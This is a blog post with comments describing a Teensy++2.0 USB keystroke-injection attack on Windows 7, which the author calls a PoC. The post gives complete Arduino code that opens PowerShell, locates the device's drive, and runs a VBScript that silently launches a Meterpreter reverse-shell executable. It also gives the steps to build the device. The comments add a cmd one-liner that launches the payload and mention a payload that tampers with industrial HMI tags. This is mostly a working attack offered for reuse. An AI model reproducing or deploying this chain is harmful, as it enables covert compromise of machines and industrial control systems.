Teensy++2.0 and Metasploit

Just got my teensy from PJRC …

http://www.pjrc.com/store/teensypp.html

This little bugger has a lot of potential and I’ve decided to test it against the mighty Windows7 with all recommended security settings and restrictions. Like the Disabled Autorun and Autoplay through domain policy etc.  At the end it was possible to own the box using a technique described below and compromise it.  It was fun working on this project so I decided to share my thoughts and code.

The environment setup is well explained on the PJRC site so I’m not gonna go through this here. My current config and libs are as follows:

  1. Teensy linux loader http://www.pjrc.com/teensy/loader.html
  2. Arduino-0022 http://arduino.googlecode.com/files/arduino-0022.tgz
  3. Teensyduinobeta Test 0.93 http://www.pjrc.com/teensy/beta/teensyduino
  4. PHUKD Library from IronGeek  http://www.irongeek.com/downloads/phukdlib0.2.zip
  5. Linux AVR development tools
    (On Debian apt-get install gcc-avr, binutils-avr, avr-libc, gdb-avr)

So with everything in place I’ve decided to create my own trojaned USB device.

Teensy++2.0 comes equipped with about 120 Kilobytes of mass storage that can be used to host our Binary payloads.  This needs to be activated within the arduino menu tools like so:

So our Teensy board will act like a USB keyboard and USB Mass storage device together.

Create a new project from the arduino IDE for example : usb-project. This is important because the IDE will create a subfolder by this name in its directory which will be useful later on.

Here is a code that I’ve created to run a meterpreter payload executable off the Teensy after plugging it into the target USB port.

/*The following is Astro's code using the PHUKD libs from 
Irongeek http://www.irongeek.com/downloads/phukdlib0.2.zip
to do some Keyboard stuff with Teensy only for educational purposes.
Use at your own risk ! 
To learn more about Teensyduino see: http://www.pjrc.com/teensy/teensyduino.html  http://www.arduino.cc/en/Reference/HomePage  Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID */ #include <phukdlib.h>
void setup() {
}
void loop ()
{
delay(5000); //Wait 5 secs to settle down
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_key1(KEY_ESC);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("powershell");
PressAndRelease(KEY_ENTER,1);
delay(5000); //Need some time on some machines to open powershell
Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
PressAndRelease(KEY_ENTER,1);
delay(500);
Keyboard.print("$drive = $disk.substring(2,2)");
PressAndRelease(KEY_ENTER,1);
delay(500);
Keyboard.print("invoke-expression $drive");
Keyboard.set_key1(KEY_BACKSLASH);
Keyboard.send_now();
Keyboard.print("exec.vbs");
PressAndRelease(KEY_ENTER,1);
delay(500);
Keyboard.print("exit");
PressAndRelease(KEY_ENTER,1);
delay(9000000);
}

What this code does:

  1. It waits for 5 seconds
  2. Loads Ctrl+Esc keys to open Windows Start Menu  (there are group policies which restrict the Win+R combination for example..)
  3. Runs powershell (While most admins lock down cmd.exe by group policy, the powershell gets omitted. There is a trick to binpatch cmd.exe using a macro with MS Word to get around the restrictions but I’m not gonna cover this here as there is not enough space for a patched cmd.exe on the Teensy anyway.)
  4. Now this was a trickiest part of it all, spent a whole day figuring how the variables in powershell work :$disk = wmic logicaldisk list brief | select-string -patter tinydisk | out-string Please note the “tinydisk” string here, this is what we are gonna label the FAT12 partition that gets created when we flash the teensy with our code.   The powershell environment is a little tricky and weird, as the stdout isn’t handled like a normal string in Linux we need to do a little trick :$drive = $disk.substring(2,2) Only now we get to keep a $string for the Teensy USB drive so we can use it to load the meterpreter payload.invoke-expression $drive\exec.vbs Now for some reason I had to manually load the “Backslash \” key with a regular Keyboard.set_key1(KEY_BACKSLASH)  function because the Keyboard.print() does not handle the backslash and the char after it at all.  So basically the one line command gets split in multiple parts : Keyboard.print(“invoke-expression $drive”);
    Keyboard.set_key1(KEY_BACKSLASH);
    Keyboard.send_now();
    Keyboard.print(“exec.vbs”);
  5. So we got to a part where Teensy calls for an exec.vbs file on its mass storage.
  6. Exit the powershell so it does not stick out on screen.

The exec.vbs is a simple Visual Basic script that silently loads the Meterpreter payload off the Teensy.

Set oShell = CreateObject("Wscript.shell")
sPath=Wscript.ScriptFullName
x=InstrRev(sPath, "\")
sPath=Left(sPath,x)
sCmd = sPath+"final.exe"
oShell.Run sCmd,0,False

In this case we are calling a file called final.exe in the root folder of the Teensy mass storage drive. It executes the final.exe silently without no window popping up. Final.exe is our compiled meterpreter binary payload that will connect back to the multi handler on our pen-test machine.

So before we compile and flash the project onto the Teensy board we need to prepare a few things. First of all the drive label and the files that will reside there. We need to have some unique disklabel for the FAT12 partition on the Teensy because without it we wont be able to find the drive letter assigned to it by Windows. In our case we are using “tinydisk” label.

So open up your terminal and locate your project folder inside the arduino directory and make sure it has the following:

You need to create a folder inside you project direcotry called disk. Inside the disk folder create a file caled .Volumelabel and edit it an place the volumelabel name there -> in this case tinydisk. Next place the needed files into this directory (exec.vbs and final.exe)

So a final scenario is :

Connect the teensy to a loggedon Windows7 machine and let it do its magic. It loads everything automatically and you get rewarded by a remote Reverse meterpreter shell on your pen-test laptop.

This is a basic sum-up of a nasty PoC using the Teensy++2.0 board, some Sploit-Fu, little powershell and some vbscript.

Part 2… Avoiding Antivirus

Part 3… The Final Productg

About these ads
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

12 Responses to Teensy++2.0 and Metasploit

  1. Jeremy says:

    Could this have been simpler if you ran the file from the Teensy without copying it? This looks pretty doable:

    for /f “tokens=1″ %i in (‘wmic logicaldisk list brief ^| find “MYDISKLABEL”‘) do @%i\final.exe

    Thanks for the writeup.

    • astr0baby says:

      I guess it would but I did not want the final.exe window shown when the payload executable gets started, so thats why I’ve used that vbs script to actually hide the window.

  2. Robert Clark says:

    Hey, I really like what you’ve done here, thank you for taking the time to write it up and share it with the community.

    This doesn’t achieve anything that you couldn’t do with hands on access to the computer but does buy you some cool stuff, it allows you to “plug and forget” as well as do things faster than you could on your own.

    It would be good if there were a way to mask the first stage, where the start menu will open momentarily but as you say Win-R is often disabled.

  3. astr0baby says:

    Thanks for commenting. Sure this does not achieve much but still, there are ways to add the
    teensy to an USB mouse or keyboard and trojan the device. Anyways this is more an exercise than a real attack. Next week I will publish some new interesting stuff.

  4. matt says:

    I woud like to use your code in some course material but want to give you full credit. Can you provide an approval of this and information as to how you would like a reference within the material.

  5. astr0baby says:

    Sure Matt, go ahead and use this. As for the reference just use my nick or this blog post.

  6. Matt says:

    Awesome … I have my own payload (exec.vbs) I am running to modify an HMI’s tags for a control system environment. The script kills the HMI runtime, swaps in fake tags, and restarts the HMI runtime. Check us out over at cybati.org to see the course I am adding this script in to. Awesome stuff – the concept of hardware hacks / supply chain is daunting!

  7. Pingback: Teensy++2 Metasploit Part. 2 | Astrobaby's random thoughts

  8. David says:

    Hello…Is there any way to get this to work if USB endpoint protection is in place to stop the use of hard disks/pendrives?

  9. Just a tip: The problem you are having with the \ symbol is because this symbol can be used for other things like \n for new line. To output the symbol you just have to use the double \\. it wil output as single and you are good to go :)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s